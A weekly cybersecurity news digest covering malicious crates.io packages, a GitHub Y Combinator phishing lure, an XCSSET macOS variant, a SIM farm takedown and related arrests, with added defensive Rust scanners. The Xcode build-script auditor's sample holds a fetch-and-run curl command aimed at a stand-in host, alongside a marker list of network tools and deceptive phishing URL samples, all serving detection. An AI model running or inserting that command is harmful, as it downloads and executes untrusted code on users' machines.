Attacks on Developers: Phishing Schemes and the Threat of SIM Farms in the Cybersecurity World

We have compiled the most significant cybersecurity news from the past week.

Two malicious packages in crates.io, the official package registry of the Rust programming language, scanned developers' machines in order to steal cryptocurrency wallet keys and other sensitive data. Between their publication on May 25, 2025, and their removal they were downloaded 8,424 times, according to a September 24 report by researchers at Socket, a software supply-chain security firm.

The malicious crates, named faster_log and async_println, were distributed through crates.io, which is to Rust what npm is to JavaScript. They impersonated the legitimate crate fast_log by copying its README and repository metadata, and they kept the real logging functionality working so that nothing looked wrong at build or run time.

Alongside the logging code, the crates scanned the victim's environment and the project's source files for specific patterns, such as hex-encoded cryptocurrency wallet private keys. On a match, the data was exfiltrated to an attacker-controlled URL that was stored in obfuscated (encoded) form in the crate's source.

On the day it was notified, crates.io removed the fake packages and blocked the accounts that had published them.
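The scanning behaviour described above is easy to turn around into a defensive check. The following is an added example, not code from Socket or from the malicious crates: a standard-library-only Rust scanner that walks a project tree and reports strings shaped like hex-encoded 32-byte private keys (64 hex digits, optionally 0x-prefixed), the shape Ethereum-style wallet keys take. The sample source text embedded in it is constructed for the demonstration; the skipped directory names and the choice of key shape are assumptions of the example.

```rust
use std::env;
use std::fs;
use std::path::{Path, PathBuf};

/// Constructed sample "source file" for a stand-alone run; none of the values is a real key.
pub const SAMPLE_SOURCE: &str = r#"
// wallet.rs (constructed sample)
const DEPLOYER_KEY: &str = "0x00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff";
const TX_HASH: &str = "0x00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff";
let keypair = json!({ "secret": "ffeeddccbbaa99887766554433221100ffeeddccbbaa99887766554433221100" });
let ident = x00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff_v2;
"#;

fn is_word_byte(b: u8) -> bool {
    b.is_ascii_alphanumeric() || b == b'_'
}

/// Return every maximal run of exactly 64 hex digits that stands on its own:
/// preceded by start-of-text, a non-word byte, or a "0x"/"0X" prefix, and
/// followed by end-of-text or a non-word byte. Longer runs (hashes,
/// signatures) and identifiers that merely contain hex are ignored.
pub fn find_hex_keys(text: &str) -> Vec<String> {
    let b = text.as_bytes();
    let mut found = Vec::new();
    let mut i = 0;
    while i < b.len() {
        if !b[i].is_ascii_hexdigit() {
            i += 1;
            continue;
        }
        let start = i;
        while i < b.len() && b[i].is_ascii_hexdigit() {
            i += 1;
        }
        let end = i;
        if end - start != 64 {
            continue;
        }
        let has_0x_prefix = start >= 2
            && (b[start - 1] == b'x' || b[start - 1] == b'X')
            && b[start - 2] == b'0'
            && (start == 2 || !is_word_byte(b[start - 3]));
        let left_ok = start == 0 || !is_word_byte(b[start - 1]) || has_0x_prefix;
        let right_ok = end == b.len() || !is_word_byte(b[end]);
        if left_ok && right_ok {
            // The run is pure ASCII, so these byte offsets are char boundaries.
            found.push(text[start..end].to_string());
        }
    }
    found
}

/// Recursively scan a directory, skipping build output and VCS metadata
/// (assumed directory names) and any file that is not valid UTF-8.
pub fn scan_dir(root: &Path) -> Vec<(PathBuf, String)> {
    let mut hits = Vec::new();
    let entries = match fs::read_dir(root) {
        Ok(e) => e,
        Err(_) => return hits,
    };
    for entry in entries.flatten() {
        let path = entry.path();
        let name = entry.file_name().to_string_lossy().into_owned();
        if path.is_dir() {
            if name == "target" || name == ".git" {
                continue;
            }
            hits.extend(scan_dir(&path));
        } else if let Ok(text) = fs::read_to_string(&path) {
            for key in find_hex_keys(&text) {
                hits.push((path.clone(), key));
            }
        }
    }
    hits
}

fn main() {
    println!("-- constructed sample --");
    for key in find_hex_keys(SAMPLE_SOURCE) {
        println!("candidate key: {}...{}", &key[..8], &key[56..]);
    }
    // Optional: `cargo run -- path/to/project` scans a real tree.
    if let Some(dir) = env::args().nth(1) {
        for (path, key) in scan_dir(Path::new(&dir)) {
            println!("{}: {}...{}", path.display(), &key[..8], &key[56..]);
        }
    }
}
```

Run over the constructed sample it reports the two genuine-looking keys and ignores the 128-digit hash and the identifier that merely contains hex. A SHA-256 digest in a lockfile has the same shape and will be reported too, which is why a check like this should present candidates for review rather than silently block a commit.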

A large-scale phishing campaign targeted GitHub users with a cryptocurrency wallet drainer, using fake invitations to the Y Combinator startup accelerator as the lure.

On September 24, BleepingComputer reported that the attackers abused GitHub's notification system, rather than any vulnerability, to deliver the lure. They opened issues in several repositories and @-mentioned their targets in them.

@-mentioning a username in an issue automatically makes GitHub email that user. Because the message genuinely originates from GitHub's mail servers, it passes the usual sender checks and lands directly in the recipient's inbox.

The bait was an invitation to apply for an upcoming Y Combinator funding round with $15 million on offer. In some repositories, up to 500 such issues were opened from a single account created only a week earlier.

Recipients were urged to follow a link to a lookalike domain whose only difference from the real one was a barely noticeable substitution: an "l" in place of an "i". The page ran JavaScript that asked visitors to connect and "verify" their cryptocurrency wallet; signing the transaction it presented authorized transfers that drained the wallet.

After abuse reports to GitHub, the FBI's IC3, and Google Safe Browsing, the fraudulent repositories were removed.
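A link checker of the kind that would have caught the "l"-for-"i" swap above. This is an added example and not part of BleepingComputer's report or of GitHub's tooling: it extracts the host from a URL (including the `user@host` trick), reduces the registrable domain to a "skeleton" in which visually confusable ASCII characters are merged, and compares that with a list of expected brand domains. The brand list, the confusable table, the two-label approximation of a registrable domain and the sample URLs are all assumptions of the example; the sample URLs are constructed and are not the real phishing domains.

```rust
/// Outcome of checking one URL against the expected brand domains.
#[derive(Debug, PartialEq)]
pub enum Verdict {
    Exact(String),
    Lookalike { brand: String, host: String },
    BrandInSubdomain { brand: String },
    NearMiss { brand: String, distance: usize },
    Unknown,
}

/// Domains we expect links to point at (assumed list for the example).
pub const BRANDS: &[&str] = &["github.com", "ycombinator.com"];

/// Extract the lowercase host from a URL. Everything before the last '@' in
/// the authority is userinfo, so "https://github.com@evil.example/" yields
/// "evil.example", which is exactly the trick the check must not fall for.
pub fn host_of(url: &str) -> Option<String> {
    let rest = url.split_once("://").map(|(_, r)| r).unwrap_or(url);
    let authority = rest.split(|c: char| c == '/' || c == '?' || c == '#').next()?;
    let hostport = authority.rsplit('@').next()?;
    let host = hostport.split(':').next()?;
    if host.is_empty() { None } else { Some(host.to_ascii_lowercase()) }
}

/// Last two labels, an approximation of the registrable domain
/// (a real implementation would consult the Public Suffix List).
pub fn registrable_domain(host: &str) -> String {
    let labels: Vec<&str> = host.split('.').collect();
    if labels.len() <= 2 { host.to_string() } else { labels[labels.len() - 2..].join(".") }
}

/// Merge characters that render alike in common fonts, so that
/// "ycomblnator" and "ycombinator" collapse to the same string.
pub fn skeleton(s: &str) -> String {
    let lower = s.to_ascii_lowercase().replace("rn", "m").replace("vv", "w");
    lower.chars().map(|c| match c {
        'i' | 'l' | '1' | '|' | '!' => 'l',
        '0' => 'o',
        '5' => 's',
        other => other,
    }).collect()
}

/// Classic edit distance, used for one-character typos that are not
/// pure homoglyph swaps (a dropped letter, an extra letter).
pub fn levenshtein(a: &str, b: &str) -> usize {
    let a: Vec<char> = a.chars().collect();
    let b: Vec<char> = b.chars().collect();
    let mut prev: Vec<usize> = (0..=b.len()).collect();
    for (i, ca) in a.iter().enumerate() {
        let mut cur = vec![i + 1];
        for (j, cb) in b.iter().enumerate() {
            let cost = if ca == cb { 0 } else { 1 };
            cur.push((prev[j] + cost).min(prev[j + 1] + 1).min(cur[j] + 1));
        }
        prev = cur;
    }
    prev[b.len()]
}

pub fn classify(url: &str, brands: &[&str]) -> Verdict {
    let host = match host_of(url) {
        Some(h) => h,
        None => return Verdict::Unknown,
    };
    let reg = registrable_domain(&host);
    if let Some(brand) = brands.iter().find(|b| **b == reg.as_str()) {
        return Verdict::Exact(brand.to_string());
    }
    if let Some(brand) = brands.iter().find(|b| skeleton(b) == skeleton(&reg)) {
        return Verdict::Lookalike { brand: brand.to_string(), host };
    }
    // Brand name used as a subdomain of an unrelated registrable domain.
    let labels: Vec<&str> = host.split('.').collect();
    let sub = &labels[..labels.len().saturating_sub(2)];
    for brand in brands {
        let sld = brand.split('.').next().unwrap_or("");
        if sub.iter().any(|l| skeleton(l) == skeleton(sld)) {
            return Verdict::BrandInSubdomain { brand: brand.to_string() };
        }
    }
    let mut best: Option<(String, usize)> = None;
    for brand in brands {
        let d = levenshtein(&skeleton(&reg), &skeleton(brand));
        if d <= 2 && best.as_ref().map_or(true, |(_, bd)| d < *bd) {
            best = Some((brand.to_string(), d));
        }
    }
    match best {
        Some((brand, distance)) => Verdict::NearMiss { brand, distance },
        None => Verdict::Unknown,
    }
}

fn main() {
    // Constructed sample links; none is a real phishing domain.
    let samples = [
        "https://github.com/org/repo/issues/1",
        "https://ycomblnator.com/apply",
        "https://github.com@evil.example/login",
        "http://github.com.evil.example/",
        "https://githb.com/",
    ];
    for url in samples {
        println!("{:<40} -> {:?}", url, classify(url, BRANDS));
    }
}
```

The skeleton step is what catches the campaign's trick: "ycomblnator.com" and "ycombinator.com" map to the same string, so the link is reported as a lookalike even though its edit distance to the brand is only one. The table covers ASCII confusables only; internationalized domain names need the Unicode confusables data in addition.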

On September 25, Microsoft Threat Intelligence reported a new variant of XCSSET, a macOS malware family that steals notes, cryptocurrency wallet data, and browser data from infected machines. It spreads by locating Xcode projects on the victim's system and injecting itself into them, so that its payload runs whenever an infected project is built.

“We believe this method of infection and spread is based on file sharing between developers creating applications for Apple or macOS,” the experts stated in their report.

Researchers noted several changes in the new version of the stealer.
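One concrete way to look for this kind of injection is to audit the run-script build phases of every Xcode project on a machine, since those are a standard hook a project has for executing commands at build time. The example below is added here and is not Microsoft's detection logic; it assumes an injected payload shows up as a `shellScript` entry in `project.pbxproj` and uses an assumed, deliberately short list of marker strings. The embedded project fragment is constructed for the demonstration and the download URL in it is a reserved, non-resolving name.

```rust
use std::env;
use std::fs;

/// Constructed fragment of a project.pbxproj with three run-script phases.
pub const SAMPLE_PBXPROJ: &str = r#"
/* Begin PBXShellScriptBuildPhase section */
		AA01 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "swiftlint --strict\n";
		};
		AA02 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "echo \"lint ok\"\n";
		};
		AA03 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL http://example.invalid/p | base64 -D > /tmp/p && sh /tmp/p\n";
		};
/* End PBXShellScriptBuildPhase section */
"#;

/// Strings that rarely belong in a legitimate build script (assumed list).
pub const MARKERS: &[&str] = &[
    "curl ", "wget ", "base64", "osascript", "eval ", "python -c", "/tmp/", "chmod +x", "nohup ",
];

/// Pull every `shellScript = "..."` value out of a pbxproj, undoing the
/// backslash escapes the format uses inside quoted strings.
pub fn extract_shell_scripts(pbxproj: &str) -> Vec<String> {
    const KEY: &str = "shellScript = \"";
    let mut scripts = Vec::new();
    let mut rest = pbxproj;
    while let Some(pos) = rest.find(KEY) {
        let body = &rest[pos + KEY.len()..];
        let mut script = String::new();
        let mut consumed = body.len();
        let mut chars = body.char_indices();
        while let Some((i, c)) = chars.next() {
            match c {
                '\\' => match chars.next() {
                    Some((_, 'n')) => script.push('\n'),
                    Some((_, 't')) => script.push('\t'),
                    Some((_, other)) => script.push(other),
                    None => break,
                },
                '"' => {
                    consumed = i + 1;
                    break;
                }
                other => script.push(other),
            }
        }
        scripts.push(script);
        rest = &body[consumed..];
    }
    scripts
}

/// Markers present in one script, in MARKERS order.
pub fn markers_in(script: &str) -> Vec<&'static str> {
    MARKERS.iter().copied().filter(|m| script.contains(*m)).collect()
}

/// Every run-script phase paired with the markers it triggers; an empty
/// marker list means the script looked clean to this heuristic.
pub fn audit(pbxproj: &str) -> Vec<(String, Vec<&'static str>)> {
    extract_shell_scripts(pbxproj)
        .into_iter()
        .map(|s| {
            let m = markers_in(&s);
            (s, m)
        })
        .collect()
}

fn main() {
    // Optional: `cargo run -- App.xcodeproj/project.pbxproj` audits a real file.
    let text = match env::args().nth(1) {
        Some(path) => fs::read_to_string(&path).expect("cannot read pbxproj"),
        None => SAMPLE_PBXPROJ.to_string(),
    };
    for (n, (script, hits)) in audit(&text).into_iter().enumerate() {
        let status = if hits.is_empty() { "ok" } else { "SUSPICIOUS" };
        println!("phase {}: {} {:?}\n    {}", n + 1, status, hits, script.trim_end());
    }
}
```

The marker list is a starting point, not a signature: a legitimate project may well call curl in a build phase, and an injected script can be obfuscated past simple substring checks, so the useful output is the full list of run scripts for a human to read, with the flagged ones first.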

On September 23, the U.S. Secret Service announced that it had uncovered and dismantled the largest SIM farm in the nation's history.

According to The New York Times, the investigation began after anonymous threats were directed at high-profile officials at the beginning of the year. Targets included two White House employees and one Secret Service officer.

During the operation, over 300 SIM servers and 100,000 SIM cards were seized. The farm was located about 56 km from UN headquarters in New York, where the General Assembly was convening world leaders, and was taken down just hours before the session.

The farm had enough capacity to send text messages to nearly every phone number in the U.S. within minutes and, in the agency's assessment, could have been used to disrupt the country's telecommunications infrastructure.

During the investigation, officers found empty apartments, rented as safe houses, in Armonk (New York), Greenwich (Connecticut), Queens (New York), and New Jersey. Agents also seized firearms, computers, mobile phones, and 80 grams of cocaine.

On September 24, a suspect was arrested in connection with the ransomware attack that caused extensive disruption to passenger-processing systems at European airports.

Law enforcement stated that the arrest followed an investigation into the cyberattack on the Multi-User System Environment (MUSE) check-in and boarding software made by Collins Aerospace. The suspect has been released on bail while the investigation continues.

The attack was detected on Friday, September 19, when reports of flight delays began to emerge. Affected hubs included London Heathrow, Brussels Airport, Dublin Airport, and Berlin Brandenburg (Willy Brandt) Airport, among others.

In an international operation coordinated by Interpol, law enforcement seized over $439 million in cash and cryptocurrency. Authorities believe the confiscated funds are linked to cybercrimes that victimized thousands of people around the globe.

Operation HAECHI VI ran from April to August with the participation of authorities in 40 countries. Investigators froze 400 cryptocurrency wallets, blocked over 68,000 related bank accounts, and seized around $16 million in cryptocurrency.

As part of the operation, 45 suspects involved in unauthorized access to social security accounts were arrested in Portugal. The Royal Thai Police also seized $6.6 million that an unnamed Japanese corporation had transferred to accounts controlled by a transnational criminal group made up of individuals from Thailand and West Africa.